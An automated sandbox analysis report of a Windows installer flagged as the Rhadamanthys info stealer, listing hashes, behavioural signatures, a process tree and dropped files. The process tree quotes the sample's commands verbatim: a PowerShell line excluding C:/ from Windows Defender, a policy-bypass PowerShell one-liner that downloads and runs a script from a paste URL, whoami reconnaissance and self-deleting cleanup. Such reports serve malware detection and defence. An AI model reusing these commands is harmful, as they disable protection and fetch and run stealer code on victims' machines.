Analysis

  • max time kernel
    123s
  • max time network
    141s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    05-08-2024 12:01

General

  • Target

    Install_x64.exe

  • Size

    152.8MB

  • MD5

    718ba2fec3b4922334113b245db63040

  • SHA1

    eb4dbf4c59d14a0e1f9e37f980367c6c0b699548

  • SHA256

    ba64b40b16dc76d830446f87a7f9e2847ba3d921eec7c3226336af8739b59d2c

  • SHA512

    4afd2102fc58dfbd1ec6854bf93700dbfa42c1636609bbbbdef0e71055d970159192ceab1fa7ad1636b6c1b0ba75bc97910199ca2a0900d25fd074b4f7802909

  • SSDEEP

    786432:wt2OSpkMhfqpHCOdRIeoxOTx9ylnEk2Fd7yLie63pk3lLwmYEDQ:wtApkMMi5w9qEn7S6S3zY5

Malware Config

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • c:\windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2484
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4572
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4624
    • C:\Users\Admin\AppData\Local\Temp\Install_x64.exe
      "C:\Users\Admin\AppData\Local\Temp\Install_x64.exe"
      1⤵
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2996
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:/'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1360
      • C:\Program Files\launcher289\1.exe
        "C:\Program Files\launcher289\1.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4248
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2252
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 520
            4⤵
            • Program crash
            PID:4268
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 500
            4⤵
            • Program crash
            PID:5112
      • C:\Program Files\launcher289\1.exe
        "C:\Program Files\launcher289\1.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:328
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 520
            4⤵
            • Program crash
            PID:1708
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 500
            4⤵
            • Program crash
            PID:4484
      • C:\Program Files\launcher289\3.exe
        "C:\Program Files\launcher289\3.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:5028
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4188
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://pst.innomi.net/paste/42zzhcyga7s4bd9fnjp33ojb/raw" ) ) )
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3000
            • C:\Windows\SysWOW64\whoami.exe
              "C:\Windows\system32\whoami.exe" /groups /fo csv
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2920
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3676

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\launcher289\1.exe

      Filesize

      13.5MB

      MD5

      2d49f4f1c9964d0f735c46fc0750561e

      SHA1

      69fbd91314fb0543b627df7a3688fcf067111846

      SHA256

      95e31ee2a74f11c0705e9eec34cd2707986f5c962eb751cfd3abdcb6b98cf19d

      SHA512

      f4230ac53e6a23a330ab2cb2189504c50f10597c50fead263d6d48eb2c671ea2d5c18b19c0dca99f39e9915258da3f4ac174a6a739f8f16eac786c4480494327

    • C:\Program Files\launcher289\3.exe

      Filesize

      14.0MB

      MD5

      5b3abc719061712a7b6ff9c85ab96b1d

      SHA1

      369d0fb981bcc6fee551da86ff5b0fe17952ded5

      SHA256

      b6dee93840a9b85ebc689343eb45e9ce64559dff65bff34a163a617a82f76070

      SHA512

      61ab170170bfc593275051801c7eee2653379feb3658880476e53b7da94029c9abf82a5fffc8dd8ae3473f7708369f33bac4f95b03e1b04ee4ba0969fc01384b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      0e10c2a380dc8143a37c1207c6a70e0d

      SHA1

      1e19db1b0505b3995c23d99ddadebe34b2a08899

      SHA256

      aa7b58c6beae55d21403061d9673b82761e64c430382fcffa14985532e528f1e

      SHA512

      38f9755ba4d077c55f2eaa8a688d71ad5af77fa99d5feaf3fdadf64caf4fbbf183ba73047feaeb5c47f7d4a32a8d1ff057fe36419327709199f29ab6e2f235ef

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_imj4lmvi.ahi.ps1

      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    • \Users\Admin\AppData\Local\Temp\.net\Install_x64\bdV2J3S7PJgwNF+38gf_Z10mFDLNp2Y=\D3DCompiler_47_cor3.dll

      Filesize

      4.7MB

      MD5

      a7349236212b0e5cec2978f2cfa49a1a

      SHA1

      5abb08949162fd1985b89ffad40aaf5fc769017e

      SHA256

      a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082

      SHA512

      c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

    • \Users\Admin\AppData\Local\Temp\.net\Install_x64\bdV2J3S7PJgwNF+38gf_Z10mFDLNp2Y=\PresentationNative_cor3.dll

      Filesize

      1.2MB

      MD5

      e67dff697095b778ab6b76229c005811

      SHA1

      88a54a3e3ff2bf83a76bbf5df8a0e50bdb36bcdc

      SHA256

      e92b997f6f3a10b43d3fdc7743307228aa3b0a43430af60ccb06efa154d37e6a

      SHA512

      6f2a2bbbfa0464537fccb53d40239a294dca8fd477e79d70cd9f74079da48525a300675d3b0daae292432adbb9dd099fd4dc95b6fe2794f4c5f3a7e56e15ef51

    • \Users\Admin\AppData\Local\Temp\.net\Install_x64\bdV2J3S7PJgwNF+38gf_Z10mFDLNp2Y=\vcruntime140_cor3.dll

      Filesize

      116KB

      MD5

      d6ac34c46569efe379b58f9b7bbcb6fc

      SHA1

      f9f67352566bb5f98a7336248d8543d9ab4da041

      SHA256

      cff0ced8b2193adff2c06119f70a037b6b79b6fc6c4a19664d4e42bc1c06a9f6

      SHA512

      09a0e43293d39bd465e87e481bf98b1f696eb633d4f49038553e77a9ecd654318db114ee3f0ed85d05b09d1712835b18aa968fd5b304142c3979e1433b770513

    • \Users\Admin\AppData\Local\Temp\.net\Install_x64\bdV2J3S7PJgwNF+38gf_Z10mFDLNp2Y=\wpfgfx_cor3.dll

      Filesize

      1.9MB

      MD5

      24ea1814e6701927b9c714e0a4c3c185

      SHA1

      95c27a6b1f5927e3021cb6f9d5ef5998b2c4560a

      SHA256

      d2ebedc0004d5e336c6092e417c11c051767c7dcbcb80303f3484fd805e084ae

      SHA512

      d6c2f32818970d989c834babeac1ce845e832b853ce1c0b3f7ecbfd41331b7d519461bcc0ef07fd35382f263b9e26ac47bb22f0370071913900fc40e3e2656f2

    • memory/1360-301-0x00007FFC5AEB0000-0x00007FFC5B89C000-memory.dmp

      Filesize

      9.9MB

    • memory/1360-264-0x000001D3F5B60000-0x000001D3F5BD6000-memory.dmp

      Filesize

      472KB

    • memory/1360-261-0x00007FFC5AEB0000-0x00007FFC5B89C000-memory.dmp

      Filesize

      9.9MB

    • memory/1360-260-0x00007FFC5AEB0000-0x00007FFC5B89C000-memory.dmp

      Filesize

      9.9MB

    • memory/1360-259-0x000001D3F5450000-0x000001D3F5472000-memory.dmp

      Filesize

      136KB

    • memory/1360-256-0x00007FFC5AEB3000-0x00007FFC5AEB4000-memory.dmp

      Filesize

      4KB

    • memory/2996-79-0x000002B8D7680000-0x000002B8D76C0000-memory.dmp

      Filesize

      256KB

    • memory/2996-44-0x000002B8D6C00000-0x000002B8D7440000-memory.dmp

      Filesize

      8.2MB

    • memory/2996-49-0x000002B8D74C0000-0x000002B8D7540000-memory.dmp

      Filesize

      512KB

    • memory/2996-74-0x000002B8D7610000-0x000002B8D7630000-memory.dmp

      Filesize

      128KB

    • memory/2996-8-0x000002B8D15A0000-0x000002B8D20C0000-memory.dmp

      Filesize

      11.1MB

    • memory/2996-84-0x000002B8D76F0000-0x000002B8D7710000-memory.dmp

      Filesize

      128KB

    • memory/2996-54-0x000002783A480000-0x000002783A490000-memory.dmp

      Filesize

      64KB

    • memory/2996-59-0x000002B8D7540000-0x000002B8D7550000-memory.dmp

      Filesize

      64KB

    • memory/2996-64-0x000002B8D7580000-0x000002B8D75A0000-memory.dmp

      Filesize

      128KB

    • memory/2996-69-0x000002B8D75C0000-0x000002B8D75E0000-memory.dmp

      Filesize

      128KB

    • memory/2996-39-0x000002B8D4AA0000-0x000002B8D4AE0000-memory.dmp

      Filesize

      256KB

    • memory/2996-34-0x000002B8D4A00000-0x000002B8D4A50000-memory.dmp

      Filesize

      320KB

    • memory/2996-28-0x000002783BEF0000-0x000002783BF30000-memory.dmp

      Filesize

      256KB

    • memory/2996-18-0x000002B8D4460000-0x000002B8D4690000-memory.dmp

      Filesize

      2.2MB

    • memory/2996-23-0x000002B8D4800000-0x000002B8D4960000-memory.dmp

      Filesize

      1.4MB

    • memory/2996-13-0x000002B8D32A0000-0x000002B8D4220000-memory.dmp

      Filesize

      15.5MB

    • memory/3000-372-0x0000000007710000-0x0000000007776000-memory.dmp

      Filesize

      408KB

    • memory/3000-394-0x0000000009540000-0x000000000955A000-memory.dmp

      Filesize

      104KB

    • memory/3000-373-0x0000000007780000-0x00000000077E6000-memory.dmp

      Filesize

      408KB

    • memory/3000-374-0x0000000008050000-0x00000000083A0000-memory.dmp

      Filesize

      3.3MB

    • memory/3000-370-0x0000000007840000-0x0000000007E68000-memory.dmp

      Filesize

      6.2MB

    • memory/3000-376-0x0000000007F30000-0x0000000007F4C000-memory.dmp

      Filesize

      112KB

    • memory/3000-377-0x0000000008790000-0x00000000087DB000-memory.dmp

      Filesize

      300KB

    • memory/3000-378-0x00000000087E0000-0x0000000008856000-memory.dmp

      Filesize

      472KB

    • memory/3000-393-0x0000000009FB0000-0x000000000A628000-memory.dmp

      Filesize

      6.5MB

    • memory/3000-371-0x0000000007670000-0x0000000007692000-memory.dmp

      Filesize

      136KB

    • memory/3000-427-0x00000000072F0000-0x00000000072FA000-memory.dmp

      Filesize

      40KB

    • memory/3000-436-0x000000000DB60000-0x000000000E08C000-memory.dmp

      Filesize

      5.2MB

    • memory/3000-453-0x000000000D630000-0x000000000D7F2000-memory.dmp

      Filesize

      1.8MB

    • memory/3000-458-0x0000000009EB0000-0x0000000009F44000-memory.dmp

      Filesize

      592KB

    • memory/3000-459-0x0000000009E50000-0x0000000009E72000-memory.dmp

      Filesize

      136KB

    • memory/3000-460-0x000000000CB30000-0x000000000D02E000-memory.dmp

      Filesize

      5.0MB

    • memory/3000-369-0x0000000004F50000-0x0000000004F86000-memory.dmp

      Filesize

      216KB

    • memory/3000-473-0x0000000009CD0000-0x0000000009CE2000-memory.dmp

      Filesize

      72KB

    • memory/3000-575-0x000000000C890000-0x000000000C922000-memory.dmp

      Filesize

      584KB